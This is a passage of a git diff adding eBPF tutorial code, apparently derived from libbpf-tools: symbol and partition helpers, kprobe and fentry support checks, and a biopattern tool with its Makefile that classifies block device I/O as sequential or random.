syms *syms, unsigned long addr, + uint64_t *offset) +{ + struct load_range *range; + struct dso *dso; + int i, j; + + for (i = 0; i < syms->dso_sz; i++) { + dso = &syms->dsos[i]; + for (j = 0; j < dso->range_sz; j++) { + range = &dso->ranges[j]; + if (addr <= range->start || addr >= range->end) + continue; + if (dso->type == DYN || dso->type == VDSO) { + /* Offset within the mmap */ + *offset = addr - range->start + range->file_off; + /* Offset within the ELF for dyn symbol lookup */ + *offset += dso->sh_addr - dso->sh_offset; + } else { + *offset = addr; + } + + return dso; + } + } + + return NULL; +} + +static int dso__load_sym_table_from_perf_map(struct dso *dso) +{ + return -1; +} + +static int dso__add_sym(struct dso *dso, const char *name, uint64_t start, + uint64_t size) +{ + struct sym *sym; + size_t new_cap; + void *tmp; + int off; + + off = btf__add_str(dso->btf, name); + if (off < 0) + return off; + + if (dso->syms_sz + 1 > dso->syms_cap) { + new_cap = dso->syms_cap * 4 / 3; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(dso->syms, sizeof(*dso->syms) * new_cap); + if (!tmp) + return -1; + dso->syms = tmp; + dso->syms_cap = new_cap; + } + + sym = &dso->syms[dso->syms_sz++]; + /* while constructing, re-use pointer as just a plain offset */ + sym->name = (void*)(unsigned long)off; + sym->start = start; + sym->size = size; + sym->offset = 0; + + return 0; +} + +static int sym_cmp(const void *p1, const void *p2) +{ + const struct sym *s1 = p1, *s2 = p2; + + if (s1->start == s2->start) + return strcmp(s1->name, s2->name); + return s1->start < s2->start ? -1 : 1; +} + +static int dso__add_syms(struct dso *dso, Elf *e, Elf_Scn *section, + size_t stridx, size_t symsize) +{ + Elf_Data *data = NULL; + + while ((data = elf_getdata(section, data)) != 0) { + size_t i, symcount = data->d_size / symsize; + + if (data->d_size % symsize) + return -1; + + for (i = 0; i < symcount; ++i) { + const char *name; + GElf_Sym sym; + + if (!gelf_getsym(data, (int)i, &sym)) + continue; + if (!(name = elf_strptr(e, stridx, sym.st_name))) + continue; + if (name[0] == '\0') + continue; + + if (sym.st_value == 0) + continue; + + if (dso__add_sym(dso, name, sym.st_value, sym.st_size)) + goto err_out; + } + } + + return 0; + +err_out: + return -1; +} + +static void dso__free_fields(struct dso *dso) +{ + if (!dso) + return; + + free(dso->name); + free(dso->ranges); + free(dso->syms); + btf__free(dso->btf); +} + +static int dso__load_sym_table_from_elf(struct dso *dso, int fd) +{ + Elf_Scn *section = NULL; + Elf *e; + int i; + + e = fd > 0 ? open_elf_by_fd(fd) : open_elf(dso->name, &fd); + if (!e) + return -1; + + while ((section = elf_nextscn(e, section)) != 0) { + GElf_Shdr header; + + if (!gelf_getshdr(section, &header)) + continue; + + if (header.sh_type != SHT_SYMTAB && + header.sh_type != SHT_DYNSYM) + continue; + + if (dso__add_syms(dso, e, section, header.sh_link, + header.sh_entsize)) + goto err_out; + } + + /* now when strings are finalized, adjust pointers properly */ + for (i = 0; i < dso->syms_sz; i++) + dso->syms[i].name = + btf__name_by_offset(dso->btf, + (unsigned long)dso->syms[i].name); + + qsort(dso->syms, dso->syms_sz, sizeof(*dso->syms), sym_cmp); + + close_elf(e, fd); + return 0; + +err_out: + dso__free_fields(dso); + close_elf(e, fd); + return -1; +} + +static int create_tmp_vdso_image(struct dso *dso) +{ + uint64_t start_addr, end_addr; + long pid = getpid(); + char buf[PATH_MAX]; + void *image = NULL; + char tmpfile[128]; + int ret, fd = -1; + uint64_t sz; + char *name; + FILE *f; + + snprintf(tmpfile, sizeof(tmpfile), "/proc/%ld/maps", pid); + f = fopen(tmpfile, "r"); + if (!f) + return -1; + + while (true) { + ret = fscanf(f, "%lx-%lx %*s %*x %*x:%*x %*u%[^\n]", + &start_addr, &end_addr, buf); + if (ret == EOF && feof(f)) + break; + if (ret != 3) + goto err_out; + + name = buf; + while (isspace(*name)) + name++; + if (!is_file_backed(name)) + continue; + if (is_vdso(name)) + break; + } + + sz = end_addr - start_addr; + image = malloc(sz); + if (!image) + goto err_out; + memcpy(image, (void *)start_addr, sz); + + snprintf(tmpfile, sizeof(tmpfile), + "/tmp/libbpf_%ld_vdso_image_XXXXXX", pid); + fd = mkostemp(tmpfile, O_CLOEXEC); + if (fd < 0) { + fprintf(stderr, "failed to create temp file: %s\n", + strerror(errno)); + goto err_out; + } + /* Unlink the file to avoid leaking */ + if (unlink(tmpfile) == -1) + fprintf(stderr, "failed to unlink %s: %s\n", tmpfile, + strerror(errno)); + if (write(fd, image, sz) == -1) { + fprintf(stderr, "failed to write to vDSO image: %s\n", + strerror(errno)); + close(fd); + fd = -1; + goto err_out; + } + +err_out: + fclose(f); + free(image); + return fd; +} + +static int dso__load_sym_table_from_vdso_image(struct dso *dso) +{ + int fd = create_tmp_vdso_image(dso); + + if (fd < 0) + return -1; + return dso__load_sym_table_from_elf(dso, fd); +} + +static int dso__load_sym_table(struct dso *dso) +{ + if (dso->type == UNKNOWN) + return -1; + if (dso->type == PERF_MAP) + return dso__load_sym_table_from_perf_map(dso); + if (dso->type == EXEC || dso->type == DYN) + return dso__load_sym_table_from_elf(dso, 0); + if (dso->type == VDSO) + return dso__load_sym_table_from_vdso_image(dso); + return -1; +} + +static struct sym *dso__find_sym(struct dso *dso, uint64_t offset) +{ + unsigned long sym_addr; + int start, end, mid; + + if (!dso->syms && dso__load_sym_table(dso)) + return NULL; + + start = 0; + end = dso->syms_sz - 1; + + /* find largest sym_addr <= addr using binary search */ + while (start < end) { + mid = start + (end - start + 1) / 2; + sym_addr = dso->syms[mid].start; + + if (sym_addr <= offset) + start = mid; + else + end = mid - 1; + } + + if (start == end && dso->syms[start].start <= offset) { + (dso->syms[start]).offset = offset - dso->syms[start].start; + return &dso->syms[start]; + } + return NULL; +} + +struct syms *syms__load_file(const char *fname) +{ + char buf[PATH_MAX], perm[5]; + struct syms *syms; + struct map map; + char *name; + FILE *f; + int ret; + + f = fopen(fname, "r"); + if (!f) + return NULL; + + syms = calloc(1, sizeof(*syms)); + if (!syms) + goto err_out; + + while (true) { + ret = fscanf(f, "%lx-%lx %4s %lx %lx:%lx %lu%[^\n]", + &map.start_addr, &map.end_addr, perm, + &map.file_off, &map.dev_major, + &map.dev_minor, &map.inode, buf); + if (ret == EOF && feof(f)) + break; + if (ret != 8) /* perf-.map */ + goto err_out; + + if (perm[2] != 'x') + continue; + + name = buf; + while (isspace(*name)) + name++; + if (!is_file_backed(name)) + continue; + + if (syms__add_dso(syms, &map, name)) + goto err_out; + } + + fclose(f); + return syms; + +err_out: + syms__free(syms); + fclose(f); + return NULL; +} + +struct syms *syms__load_pid(pid_t tgid) +{ + char fname[128]; + + snprintf(fname, sizeof(fname), "/proc/%ld/maps", (long)tgid); + return syms__load_file(fname); +} + +void syms__free(struct syms *syms) +{ + int i; + + if (!syms) + return; + + for (i = 0; i < syms->dso_sz; i++) + dso__free_fields(&syms->dsos[i]); + free(syms->dsos); + free(syms); +} + +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr) +{ + struct dso *dso; + uint64_t offset; + + dso = syms__find_dso(syms, addr, &offset); + if (!dso) + return NULL; + return dso__find_sym(dso, offset); +} + +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset) +{ + struct dso *dso; + uint64_t offset; + + dso = syms__find_dso(syms, addr, &offset); + if (!dso) + return NULL; + + *dso_name = dso->name; + *dso_offset = offset; + + return dso__find_sym(dso, offset); +} + +struct syms_cache { + struct { + struct syms *syms; + int tgid; + } *data; + int nr; +}; + +struct syms_cache *syms_cache__new(int nr) +{ + struct syms_cache *syms_cache; + + syms_cache = calloc(1, sizeof(*syms_cache)); + if (!syms_cache) + return NULL; + if (nr > 0) + syms_cache->data = calloc(nr, sizeof(*syms_cache->data)); + return syms_cache; +} + +void syms_cache__free(struct syms_cache *syms_cache) +{ + int i; + + if (!syms_cache) + return; + + for (i = 0; i < syms_cache->nr; i++) + syms__free(syms_cache->data[i].syms); + free(syms_cache->data); + free(syms_cache); +} + +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid) +{ + void *tmp; + int i; + + for (i = 0; i < syms_cache->nr; i++) { + if (syms_cache->data[i].tgid == tgid) + return syms_cache->data[i].syms; + } + + tmp = realloc(syms_cache->data, (syms_cache->nr + 1) * + sizeof(*syms_cache->data)); + if (!tmp) + return NULL; + syms_cache->data = tmp; + syms_cache->data[syms_cache->nr].syms = syms__load_pid(tgid); + syms_cache->data[syms_cache->nr].tgid = tgid; + return syms_cache->data[syms_cache->nr++].syms; +} + +struct partitions { + struct partition *items; + int sz; +}; + +static int partitions__add_partition(struct partitions *partitions, + const char *name, unsigned int dev) +{ + struct partition *partition; + void *tmp; + + tmp = realloc(partitions->items, (partitions->sz + 1) * + sizeof(*partitions->items)); + if (!tmp) + return -1; + partitions->items = tmp; + partition = &partitions->items[partitions->sz]; + partition->name = strdup(name); + partition->dev = dev; + partitions->sz++; + + return 0; +} + +struct partitions *partitions__load(void) +{ + char part_name[DISK_NAME_LEN]; + unsigned int devmaj, devmin; + unsigned long long nop; + struct partitions *partitions; + char buf[64]; + FILE *f; + + f = fopen("/proc/partitions", "r"); + if (!f) + return NULL; + + partitions = calloc(1, sizeof(*partitions)); + if (!partitions) + goto err_out; + + while (fgets(buf, sizeof(buf), f) != NULL) { + /* skip heading */ + if (buf[0] != ' ' || buf[0] == '\n') + continue; + if (sscanf(buf, "%u %u %llu %s", &devmaj, &devmin, &nop, + part_name) != 4) + goto err_out; + if (partitions__add_partition(partitions, part_name, + MKDEV(devmaj, devmin))) + goto err_out; + } + + fclose(f); + return partitions; + +err_out: + partitions__free(partitions); + fclose(f); + return NULL; +} + +void partitions__free(struct partitions *partitions) +{ + int i; + + if (!partitions) + return; + + for (i = 0; i < partitions->sz; i++) + free(partitions->items[i].name); + free(partitions->items); + free(partitions); +} + +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (partitions->items[i].dev == dev) + return &partitions->items[i]; + } + + return NULL; +} + +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (strcmp(partitions->items[i].name, name) == 0) + return &partitions->items[i]; + } + + return NULL; +} + +static void print_stars(unsigned int val, unsigned int val_max, int width) +{ + int num_stars, num_spaces, i; + bool need_plus; + + num_stars = min(val, val_max) * width / val_max; + num_spaces = width - num_stars; + need_plus = val > val_max; + + for (i = 0; i < num_stars; i++) + printf("*"); + for (i = 0; i < num_spaces; i++) + printf(" "); + if (need_plus) + printf("+"); +} + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type) +{ + int stars_max = 40, idx_max = -1; + unsigned int val, val_max = 0; + unsigned long long low, high; + int stars, width, i; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) + idx_max = i; + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf("%*s%-*s : count distribution\n", idx_max <= 32 ? 5 : 15, "", + idx_max <= 32 ? 19 : 29, val_type); + + if (idx_max <= 32) + stars = stars_max; + else + stars = stars_max / 2; + + for (i = 0; i <= idx_max; i++) { + low = (1ULL << (i + 1)) >> 1; + high = (1ULL << (i + 1)) - 1; + if (low == high) + low -= 1; + val = vals[i]; + width = idx_max <= 32 ? 10 : 20; + printf("%*lld -> %-*lld : %-8d |", width, low, width, high, val); + print_stars(val, val_max, stars); + printf("|\n"); + } +} + +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type) +{ + int i, stars_max = 40, idx_min = -1, idx_max = -1; + unsigned int val, val_max = 0; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) { + idx_max = i; + if (idx_min < 0) + idx_min = i; + } + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf(" %-13s : count distribution\n", val_type); + for (i = idx_min; i <= idx_max; i++) { + val = vals[i]; + if (!val) + continue; + printf(" %-10d : %-8d |", base + i * step, val); + print_stars(val, val_max, stars_max); + printf("|\n"); + } +} + +unsigned long long get_ktime_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC, &ts); + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +bool is_kernel_module(const char *name) +{ + bool found = false; + char buf[64]; + FILE *f; + + f = fopen("/proc/modules", "r"); + if (!f) + return false; + + while (fgets(buf, sizeof(buf), f) != NULL) { + if (sscanf(buf, "%s %*s\n", buf) != 1) + break; + if (!strcmp(buf, name)) { + found = true; + break; + } + } + + fclose(f); + return found; +} + +static bool fentry_try_attach(int id) +{ + int prog_fd, attach_fd; + char error[4096]; + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + LIBBPF_OPTS(bpf_prog_load_opts, opts, + .expected_attach_type = BPF_TRACE_FENTRY, + .attach_btf_id = id, + .log_buf = error, + .log_size = sizeof(error), + ); + + prog_fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, "test", "GPL", insns, + sizeof(insns) / sizeof(struct bpf_insn), &opts); + if (prog_fd < 0) + return false; + + attach_fd = bpf_raw_tracepoint_open(NULL, prog_fd); + if (attach_fd >= 0) + close(attach_fd); + + close(prog_fd); + return attach_fd >= 0; +} + +bool fentry_can_attach(const char *name, const char *mod) +{ + struct btf *btf, *vmlinux_btf, *module_btf = NULL; + int err, id; + + vmlinux_btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(vmlinux_btf); + if (err) + return false; + + btf = vmlinux_btf; + + if (mod) { + module_btf = btf__load_module_btf(mod, vmlinux_btf); + err = libbpf_get_error(module_btf); + if (!err) + btf = module_btf; + } + + id = btf__find_by_name_kind(btf, name, BTF_KIND_FUNC); + + btf__free(module_btf); + btf__free(vmlinux_btf); + return id > 0 && fentry_try_attach(id); +} + +bool kprobe_exists(const char *name) +{ + char addr_range[256]; + char sym_name[256]; + FILE *f; + int ret; + + f = fopen("/sys/kernel/debug/kprobes/blacklist", "r"); + if (!f) + goto avail_filter; + + while (true) { + ret = fscanf(f, "%s %s%*[^\n]\n", addr_range, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 2) { + fprintf(stderr, "failed to read symbol from kprobe blacklist\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return false; + } + } + fclose(f); + +avail_filter: + f = fopen("/sys/kernel/debug/tracing/available_filter_functions", "r"); + if (!f) + goto slow_path; + + while (true) { + ret = fscanf(f, "%s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from available_filter_functions\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; + +slow_path: + f = fopen("/proc/kallsyms", "r"); + if (!f) + return false; + + while (true) { + ret = fscanf(f, "%*x %*c %s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from kallsyms\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; +} + +bool tracepoint_exists(const char *category, const char *event) +{ + char path[PATH_MAX]; + + snprintf(path, sizeof(path), "/sys/kernel/debug/tracing/events/%s/%s/format", category, event); + if (!access(path, F_OK)) + return true; + return false; +} + +bool vmlinux_btf_exists(void) +{ + struct btf *btf; + int err; + + btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(btf); + if (err) + return false; + + btf__free(btf); + return true; +} + +bool module_btf_exists(const char *mod) +{ + char sysfs_mod[80]; + + if (mod) { + snprintf(sysfs_mod, sizeof(sysfs_mod), "/sys/kernel/btf/%s", mod); + if (!access(sysfs_mod, R_OK)) + return true; + } + return false; +} + +bool probe_tp_btf(const char *name) +{ + LIBBPF_OPTS(bpf_prog_load_opts, opts, .expected_attach_type = BPF_TRACE_RAW_TP); + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + int fd, insn_cnt = sizeof(insns) / sizeof(struct bpf_insn); + + opts.attach_btf_id = libbpf_find_vmlinux_btf_id(name, BPF_TRACE_RAW_TP); + fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, NULL, "GPL", insns, insn_cnt, &opts); + if (fd >= 0) + close(fd); + return fd >= 0; +} + +bool probe_ringbuf() +{ + int map_fd; + + map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, NULL, 0, 0, getpagesize(), NULL); + if (map_fd < 0) + return false; + + close(map_fd); + return true; +} diff --git a/16-memleak/trace_helpers.h b/16-memleak/trace_helpers.h new file mode 100644 index 0000000..171bc4e --- /dev/null +++ b/16-memleak/trace_helpers.h @@ -0,0 +1,104 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __TRACE_HELPERS_H +#define __TRACE_HELPERS_H + +#include + +#define NSEC_PER_SEC 1000000000ULL + +struct ksym { + const char *name; + unsigned long addr; +}; + +struct ksyms; + +struct ksyms *ksyms__load(void); +void ksyms__free(struct ksyms *ksyms); +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr); +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name); + +struct sym { + const char *name; + unsigned long start; + unsigned long size; + unsigned long offset; +}; + +struct syms; + +struct syms *syms__load_pid(int tgid); +struct syms *syms__load_file(const char *fname); +void syms__free(struct syms *syms); +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr); +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset); + +struct syms_cache; + +struct syms_cache *syms_cache__new(int nr); +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid); +void syms_cache__free(struct syms_cache *syms_cache); + +struct partition { + char *name; + unsigned int dev; +}; + +struct partitions; + +struct partitions *partitions__load(void); +void partitions__free(struct partitions *partitions); +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev); +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name); + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type); +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type); + +unsigned long long get_ktime_ns(void); + +bool is_kernel_module(const char *name); + +/* + * When attempting to use kprobe/kretprobe, please check out new fentry/fexit + * probes, as they provide better performance and usability. But in some + * situations we have to fallback to kprobe/kretprobe probes. This helper + * is used to detect fentry/fexit support for the specified kernel function. + * + * 1. A gap between kernel versions, kernel BTF is exposed + * starting from 5.4 kernel. but fentry/fexit is actually + * supported starting from 5.5. + * 2. Whether kernel supports module BTF or not + * + * *name* is the name of a kernel function to be attached to, which can be + * from vmlinux or a kernel module. + * *mod* is a hint that indicates the *name* may reside in module BTF, + * if NULL, it means *name* belongs to vmlinux. + */ +bool fentry_can_attach(const char *name, const char *mod); + +/* + * The name of a kernel function to be attached to may be changed between + * kernel releases. This helper is used to confirm whether the target kernel + * uses a certain function name before attaching. + * + * It is achieved by scaning + * /sys/kernel/debug/tracing/available_filter_functions + * If this file does not exist, it fallbacks to parse /proc/kallsyms, + * which is slower. + */ +bool kprobe_exists(const char *name); +bool tracepoint_exists(const char *category, const char *event); + +bool vmlinux_btf_exists(void); +bool module_btf_exists(const char *mod); + +bool probe_tp_btf(const char *name); +bool probe_ringbuf(); + +#endif /* __TRACE_HELPERS_H */ diff --git a/17-biopattern/.gitignore b/17-biopattern/.gitignore new file mode 100644 index 0000000..f79e42b --- /dev/null +++ b/17-biopattern/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +biopattern diff --git a/17-biopattern/Makefile b/17-biopattern/Makefile new file mode 100644 index 0000000..9171a00 --- /dev/null +++ b/17-biopattern/Makefile @@ -0,0 +1,145 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = biopattern # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +trace_helpers.o: trace_helpers.c trace_helpers.h + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $< -o $@ + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) trace_helpers.o | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/17-biopattern/biopattern.bpf.c b/17-biopattern/biopattern.bpf.c new file mode 100644 index 0000000..c7d306e --- /dev/null +++ b/17-biopattern/biopattern.bpf.c @@ -0,0 +1,57 @@ +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; diff --git a/17-biopattern/biopattern.c b/17-biopattern/biopattern.c new file mode 100644 index 0000000..d9e9abf --- /dev/null +++ b/17-biopattern/biopattern.c @@ -0,0 +1,239 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Wenbo Zhang +// +// Based on biopattern(8) from BPF-Perf-Tools-Book by Brendan Gregg. +// 17-Jun-2020 Wenbo Zhang Created this. +#include +#include +#include +#include +#include +#include +#include +#include "biopattern.h" +#include "biopattern.skel.h" +#include "trace_helpers.h" + +static struct env { + char *disk; + time_t interval; + bool timestamp; + bool verbose; + int times; +} env = { + .interval = 99999999, + .times = 99999999, +}; + +static volatile bool exiting; + +const char *argp_program_version = "biopattern 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; +const char argp_program_doc[] = +"Show block device I/O pattern.\n" +"\n" +"USAGE: biopattern [--help] [-T] [-d DISK] [interval] [count]\n" +"\n" +"EXAMPLES:\n" +" biopattern # show block I/O pattern\n" +" biopattern 1 10 # print 1 second summaries, 10 times\n" +" biopattern -T 1 # 1s summaries with timestamps\n" +" biopattern -d sdc # trace sdc only\n"; + +static const struct argp_option opts[] = { + { "timestamp", 'T', NULL, 0, "Include timestamp on output" }, + { "disk", 'd', "DISK", 0, "Trace this disk only" }, + { "verbose", 'v', NULL, 0, "Verbose debug output" }, + { NULL, 'h', NULL, OPTION_HIDDEN, "Show the full help" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + static int pos_args; + + switch (key) { + case 'h': + argp_state_help(state, stderr, ARGP_HELP_STD_HELP); + break; + case 'v': + env.verbose = true; + break; + case 'd': + env.disk = arg; + if (strlen(arg) + 1 > DISK_NAME_LEN) { + fprintf(stderr, "invaild disk name: too long\n"); + argp_usage(state); + } + break; + case 'T': + env.timestamp = true; + break; + case ARGP_KEY_ARG: + errno = 0; + if (pos_args == 0) { + env.interval = strtol(arg, 